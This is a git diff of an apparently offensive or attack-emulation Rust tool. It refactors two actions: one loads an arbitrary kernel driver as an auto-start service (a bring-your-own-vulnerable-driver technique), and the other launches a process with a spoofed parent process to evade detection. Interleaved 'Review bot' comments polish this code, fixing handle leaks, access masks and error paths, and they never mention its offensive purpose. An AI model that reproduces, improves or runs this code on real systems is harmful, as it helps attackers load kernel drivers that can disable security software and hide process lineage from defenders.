diff --git a/src/actions/drivers/byovd.rs b/src/actions/drivers/byovd.rs
index 9ac8beb..fb75979 100644
--- a/src/actions/drivers/byovd.rs
+++ b/src/actions/drivers/byovd.rs
@@ -6,7 +6,7 @@ use crate::{actions::Runnable, windows::users::is_administrator};
 use clap::Parser;
 use std::{error::Error, path::PathBuf};
 use windows::{
- core::{Owned, Result as WindowsResult, HSTRING, PCWSTR},
+ core::{Owned, HSTRING, PCWSTR},
 Win32::System::Services::{
 CreateServiceW, OpenSCManagerW, StartServiceW, SC_HANDLE, SC_MANAGER_ALL_ACCESS,
 SC_MANAGER_CREATE_SERVICE, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, SERVICE_KERNEL_DRIVER,
@@ -23,44 +23,36 @@ pub struct Byovd {
 path: PathBuf,
 }
 
-fn load_driver(name: &str, details: &str, path: &str) -> WindowsResult<()> {
- unsafe {
- let service_manager: Owned = Owned::new(OpenSCManagerW(
- PCWSTR::null(),
- PCWSTR::null(),
- SC_MANAGER_CREATE_SERVICE,
- )?);
-
- let service: Owned = Owned::new(CreateServiceW(
- *service_manager,
- &HSTRING::from(name),
- &HSTRING::from(details),
- SC_MANAGER_ALL_ACCESS,
- SERVICE_KERNEL_DRIVER,
- SERVICE_AUTO_START,
- SERVICE_ERROR_IGNORE,
- &HSTRING::from(path),
- PCWSTR::null(),
- None,
- PCWSTR::null(),
- PCWSTR::null(),
- PCWSTR::null(),
- )?);
-
- Ok(StartServiceW(*service, None)?)
- }
-}
-
 impl Runnable for Byovd {
 fn run(&self) -> Result<(), Box> {
 if !is_administrator()? {
 return Ok(());
 }
 
- Ok(load_driver(
- &self.internal,
- &self.display,
- self.path.to_str().unwrap(),
- )?)
+ unsafe {
+ let service_manager: Owned = Owned::new(OpenSCManagerW(
+ PCWSTR::null(),
+ PCWSTR::null(),
+ SC_MANAGER_CREATE_SERVICE,
+ )?);
+
+ let service: Owned = Owned::new(CreateServiceW(
+ *service_manager,
+ &HSTRING::from(self.internal.as_str()),
+ &HSTRING::from(self.display.as_str()),
+ SC_MANAGER_ALL_ACCESS,
+ SERVICE_KERNEL_DRIVER,
+ SERVICE_AUTO_START,
+ SERVICE_ERROR_IGNORE,
+ &HSTRING::from(self.path.to_str().unwrap()),
+ PCWSTR::null(),
+ None,
+ PCWSTR::null(),
+ PCWSTR::null(),
+ PCWSTR::null(),
+ )?);
+
+ Ok(StartServiceW(*service, None)?)
+ }
 }
 }
diff --git a/src/actions/processes/spoofing.rs b/src/actions/processes/spoofing.rs
index dfe16b2..317667d 100644
--- a/src/actions/processes/spoofing.rs
+++ b/src/actions/processes/spoofing.rs
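Review bot: `HSTRING::from(self.path.to_str().unwrap())` in the inlined `run` body panics on a non-UTF-8 path, so a bad CLI argument becomes a crash rather than the `Err` the method's `Result` return type promises; `self.path.to_str().ok_or("driver path is not valid UTF-8")?` keeps the failure on the same error path as the surrounding `?` calls. The access mask handed to `CreateServiceW` is `SC_MANAGER_ALL_ACCESS`, a service-control-manager right applied to a service object; since the handle is only ever passed to `StartServiceW`, requesting `SERVICE_START` from the same `Services` module is both the matching constant and the least-privilege one. The method also lacks a doc comment even though it registers a `SERVICE_AUTO_START` kernel-driver service and nothing in `run` deletes it afterwards; a `///` line saying that the service persists after the action completes and must be removed separately would help whoever cleans up after a run.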
@@ -26,77 +26,76 @@ pub struct Spoofing {
 parent_executable: String,
 }
 
-fn spoof(executable: &str, parent_pid: u32) -> Result<(), Box> {
- let mut required_size: usize = 0;
+impl Runnable for Spoofing {
+ fn run(&self) -> Result<(), Box> {
+ let mut required_size: usize = 0;
 
- unsafe {
- let _ = InitializeProcThreadAttributeList(
- LPPROC_THREAD_ATTRIBUTE_LIST::default(),
- 1,
- 0,
- &mut required_size,
- );
- };
+ unsafe {
+ let _ = InitializeProcThreadAttributeList(
+ LPPROC_THREAD_ATTRIBUTE_LIST::default(),
+ 1,
+ 0,
+ &mut required_size,
+ );
+ };
 
- let mut attributes: Box<[u8]> = vec![0; required_size].into_boxed_slice();
- let attributes_list: Owned = unsafe {
- Owned::new(LPPROC_THREAD_ATTRIBUTE_LIST(
- attributes.as_mut_ptr() as *mut _
- ))
- };
- let startup_informations: STARTUPINFOEXW = STARTUPINFOEXW {
- StartupInfo: STARTUPINFOW {
- cb: size_of::() as u32,
- ..Default::default()
- },
- lpAttributeList: *attributes_list,
- };
+ let mut attributes: Box<[u8]> = vec![0; required_size].into_boxed_slice();
+ let attributes_list: Owned = unsafe {
+ Owned::new(LPPROC_THREAD_ATTRIBUTE_LIST(
+ attributes.as_mut_ptr() as *mut _
+ ))
+ };
+ let startup_informations: STARTUPINFOEXW = STARTUPINFOEXW {
+ StartupInfo: STARTUPINFOW {
+ cb: size_of::() as u32,
+ ..Default::default()
+ },
+ lpAttributeList: *attributes_list,
+ };
 
- unsafe {
- InitializeProcThreadAttributeList(
- startup_informations.lpAttributeList,
- 1,
- 0,
- &mut required_size,
- )?;
+ unsafe {
+ InitializeProcThreadAttributeList(
+ startup_informations.lpAttributeList,
+ 1,
+ 0,
+ &mut required_size,
+ )?;
 
- let mut parent_process: Owned =
- Owned::new(OpenProcess(PROCESS_CREATE_PROCESS, false, parent_pid)?);
- UpdateProcThreadAttribute(
- startup_informations.lpAttributeList,
- 0,
- PROC_THREAD_ATTRIBUTE_PARENT_PROCESS as usize,
- Some(&mut *parent_process as *mut _ as *mut _),
- size_of::(),
- None,
- None,
- )?;
+ let mut parent_process: Owned = Owned::new(OpenProcess(
+ PROCESS_CREATE_PROCESS,
+ false,
+ get_pid(self.parent_executable.as_str())?,
+ )?);
+ UpdateProcThreadAttribute(
+ startup_informations.lpAttributeList,
+ 0,
+ PROC_THREAD_ATTRIBUTE_PARENT_PROCESS as usize,
+ Some(&mut *parent_process as *mut _ as *mut _),
+ size_of::(),
+ None,
+ None,
+ )?;
 
- CreateProcessW(
- None,
- PWSTR(
- OsString::from(executable)
- .encode_wide()
- .chain(once(0))
- .collect::>()
- .as_mut_ptr(),
- ),
- None,
- None,
- false,
- EXTENDED_STARTUPINFO_PRESENT,
- None,
- None,
- &startup_informations.StartupInfo,
- &mut PROCESS_INFORMATION::default(),
- )?;
- };
+ CreateProcessW(
+ None,
+ PWSTR(
+ OsString::from(self.executable.as_str())
+ .encode_wide()
+ .chain(once(0))
+ .collect::>()
+ .as_mut_ptr(),
+ ),
+ None,
+ None,
+ false,
+ EXTENDED_STARTUPINFO_PRESENT,
+ None,
+ None,
+ &startup_informations.StartupInfo,
+ &mut PROCESS_INFORMATION::default(),
+ )?;
+ };
 
- Ok(())
-}
-
-impl Runnable for Spoofing {
- fn run(&self) -> Result<(), Box> {
- Ok(spoof(&self.executable, get_pid(&self.parent_executable)?)?)
+ Ok(())
 }
 }
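Review bot: The `PROCESS_INFORMATION` passed to `CreateProcessW` is a throw-away temporary (`&mut PROCESS_INFORMATION::default()`), so the `hProcess` and `hThread` handles the call fills in are never closed and leak for as long as the caller lives. Capturing the struct in a local and wrapping both handles in `Owned`, which this file already uses for the parent-process handle, releases them when the unsafe block ends. Two invariants in the new body also deserve a comment: `attributes_list` is declared after `attributes` so that it is dropped (and, assuming `Owned<LPPROC_THREAD_ATTRIBUTE_LIST>` deletes the list on drop, cleaned up) before the backing buffer is freed, and the `Vec<u16>` behind the `PWSTR` only stays valid because temporaries live until the end of the `CreateProcessW(...)?;` statement.
```rust
            // … unchanged: attribute list setup, OpenProcess and UpdateProcThreadAttribute …
            let mut process_information = PROCESS_INFORMATION::default();
            CreateProcessW(
                // … unchanged: the other CreateProcessW arguments …
                &startup_informations.StartupInfo,
                &mut process_information,
            )?;
            // Take ownership of the handles CreateProcessW hands back so they are released on drop.
            let _process = Owned::new(process_information.hProcess);
            let _thread = Owned::new(process_information.hThread);
```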